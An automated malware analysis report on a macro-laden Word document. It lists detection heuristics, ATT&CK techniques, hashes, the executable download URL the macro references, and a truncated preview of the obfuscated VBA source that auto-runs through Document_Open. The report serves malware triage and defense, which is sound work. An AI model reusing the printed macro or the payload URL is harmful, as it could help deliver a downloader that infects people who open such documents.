MALICIOUS
264
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.003 Windows Command Shell
T1204.002 Malicious File
The sample contains a VBA macro that executes cmd.exe via the Shell() function. The macro is obfuscated and appears to be designed to download and execute a second-stage payload from a URL, which is a common technique for malware delivery. The presence of a Document_Open macro further indicates malicious intent.
Heuristics 8
-
VBA project inside OOXML medium 5 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Obfuscated VBA Shell command with URL critical OLE_VBA_OBFUSCATED_SHELL_URLVBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own.
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
cmd.exe reference in VBA high OLE_VBA_CMDcmd.exe reference in VBA
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://thomeddiesharefile.com/Uni/winxpversion.exe Referenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingCanvasReferenced by macro
- http://schemas.microsoft.com/office/drawing/2014/chartexReferenced by macro
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexReferenced by macro
- http://schemas.openxmlformats.org/markup-compatibility/2006Referenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsReferenced by macro
- http://schemas.openxmlformats.org/officeDocument/2006/mathReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingReferenced by macro
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2012/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2015/wordml/symexReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkReferenced by macro
- http://schemas.microsoft.com/office/word/2006/wordmlReferenced by macro
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeReferenced by macro
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 72066 bytes |
SHA-256: b2eaf82b0adc1778f00fb94fa66fdf9dda091cc456edeebba30780cbf186b206 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 11 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Private Sub Document_Open()
Call saksyzcsxhgfmuq
End Sub
Private Sub saksyzcsxhgfmuq()
Dim s34 As Object
Dim ksvtbkcuedbtldlqwlefd As Date
Dim ylrvhnuwqefeswlrzmkzcn
Dim eqpwiofjcb
If 0 = 23 Then
Else
Dim jlughjjypaapsx
Dim kyewqgfkvirtmzjj As Object
End If
Dim agzfeebdpvczotnxcvztofhwcy As Variant
Dim uxankvrbabqxoyauyeeeej As Date
Dim ssqvlrjtbhtzcuexbq
Dim enoyxitvbdowjurpnwq
Dim cwnrju
uxankvrbabqxoyauyeeeej = 53
Do While 346 < 7
Select Case nqguyesbxaebnxtlpmxjqgzxxpd
Case "«³Þî?ÀçµÓ£?ᢨÅ", "?Çêö?²", "?¸éó�ºæ¸Üµ?ç¥?Ä"
gtclojj = "?Çáì?°åºß??Þ§¨Àé«´æï?±ÞÊÛ³�ó£¡ÌÚ "
Case "?Ëñà?»ãÇ×£?ð?¥", "¤¶æô?¸ô¼"
suffix = "�¼Þô Äì"
Case "§Æôç?ÀòÃÌ??ã°£ÈÖ ¶çå?²êÁÐ ?ó?©ÃãªÅè", "ª¿Þà?¿òËÛ¡?ç"
gtclojj = "Êïæ?ÇìÍܧ?Ú¨?ÅÛªºàï?³áÂØ«?ò??ØØ?"
Case Else
evhrgtqxjkbneejvbczilsdnkxj = "mfdskohgzrhkr"
End Select
Dim igfgtjbn
Dim mvsvvwg
Dim vcgfbeglibfvglbowyihilodvm
Exit Do
Randomize
Loop
Dim kooak As Variant
Dim ocwab As Date
Dim gxocmpq
Dim gshxbbcx
Dim erahquliqfgrbvhkqtvliixlpytit
ocwab = 76
Do While 832 < 7
Select Case kaoyalcbxfejjdjv
Case "�Áîñ?¶ê¶ß¨?Þ£ Åì?¾ãì?ÆîºÉ²�è", " »îà", "?Áôá?¼äÇÏ¡?ë°?Æá?Ççõ¤¼"
shwfsrmzh = "¥¼ãõ¥ºò"
Case "§Êåî", "?¼ãò?½ë»Þ¯?ò®§Øä¢"
suffix = "£ºáä?º÷¸Õ??ê«?Óá?"
Case "«¸óí?¼ßÎÜ??ܧ?Îé¡»àô?", "?Åàß?ÁâÁд?ñ¤?Õê?¸éð?´îµØ¤?å??Ñߢ"
shwfsrmzh = "?½âï?·â¸Ð?�ì¤�ÎØ?Äìá"
Case Else
lgghhwrmrsamgtleyqw = "tbmy"
End Select
Dim defmtesryveqoh
Dim xchvmyvbdymiuymwber
Dim ppnpk
Exit Do
Randomize
Loop
Dim zikwihqkbslpllmdt As Variant
Dim kpql As Date
Dim frdqidvlvvfkhitotenuqtzjlw
Dim qptsmnazidypagyfouxsnu
Dim zzmrqmfaqtakxvmkuuzaafcuevxoizqjbuza
kpql = 82
Do While 177 < 3
Select Case mvcgeaktif
Case "¨¸Üà�¹ÞÉ˳?å©?Ñ⪽ãî?³èÆШ?ᡧÒã?º", "¬Áæä?¸õÆÜ", "?¾è÷�ÄÞÃÚ±?맨ÒÞ?¶ëé?Ãô"
aexzsdudrnfgsqjkjeaxwtplgypufhjz = "?Éçò?²Þ"
Case "?µñ", "¥Çáì¡ÃõÎȯ?í¦©Ôí¨¸Ûø?»âÇÕ±?"
suffix = "«´òó?²à¶Ø¤?ç°?ÂÙ?Èêé?ÁôÆÕ�?ë? Ì⪽"
Case "?Äßö?±ì¿Ê??æ??×Þ¤¶òì?µôÊ×", "¥Àôß�Áæ¿Ç±�Ü?Íå?´èç?µæÌØ"
aexzsdudrnfgsqjkjeaxwtplgypufhjz = "?»âõ¢Åó¸É¯?òª§Íé?²âô?Áð¸Ï³?ß??Ì"
Case Else
wwtkfkfesxywokcwllwhsgkmlppzwjx = "loftmgplu"
End Select
Dim cwftcyvoskevfvusujzbjsuvdvoszm
Dim gbvjzmdsowaqrzlsklihg
Dim objqgk
Exit Do
Randomize
Loop
Dim qvdauikrglspjzhsrmhv As Variant
Dim djbobqrmeraqbzjvvwoudceiiybjkzopo As Date
Dim lmxhujgbymwfuntrlznbsgyjtit
Dim lhmczbebfjnenmxxaokwngktg
Dim rqxjhpnzxtgyyewsuwunsofewjis
djbobqrmeraqbzjvvwoudceiiybjkzopo = 91
Do While 304 < 5
Select Case tzwjbjzysngkkuyoijdfwvzf
Case "?Æðò?²óËÝ®?ïª�Î×?ËÝ÷�ÀãÌÝ?æ¤?ÔÜ£", "«Âîó?ÈçÃߥ?梩Ùë«·äî?", "©½äè?ÂõµÍµ?Ú£?Åì¬ÅÞå?Ãâ½Ô©?ñ??Ä×"
sboqltlqautaczqknaxwlek = "¤Åñó?»ì¼É¯?ࡨËÙ�Áãó?ÈñÇʯ?è¥�Ìä"
Case "?Çëß¡°çÊÔ¢?ç?¡", "§´ãç�µÞËܨ ò?¥ÂÖ§Åñà?ÂæºÌµ?Ü¥�Ù"
suffix = "?¹æì?¶ëÇÙ¯"
Case "©ºôð?ÁàÊÛ �Û¡£ÒÙ«Åéó?²àÉÊ??è¯", "?Åßå?±è¾Ç¯�祩Ãê?Ëò"
sboqltlqautaczqknaxwlek = "Ãáä?µìÃݨ�ð??ÍÚ?¾åì"
Case Else
snmfimjxogyvaxf = "kpuavjwurlcrx"
End Select
Dim rceckcvwstntm
Dim cpbompl
Dim qldcjmidznljumvsqpfyjcrklqo
Exit Do
Randomize
Loop
If 9 = 8 Then
Dim nbdkvthnhfxufp
Else
Dim qvvvhgurocvktgvtfqlastqrxxobzwcrahs
Dim apzsqarmfhqk As String
apzsqarmfhqk = "kbGumBt"
Dim dssraeklnrdrypgqjnwttminsr As String
dssraeklnrdrypgqjnwttminsr = "YmooUJMF"
Dim dnymqhdbjscqtsob
... (truncated)
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: word/vbaProject.bin | 143872 bytes |
SHA-256: 0c7039aefbdfa9e2cbada52ddcb543e3f2c7652bb12820b97a23d873a280819e |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 11 long base64-like blob(s).
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.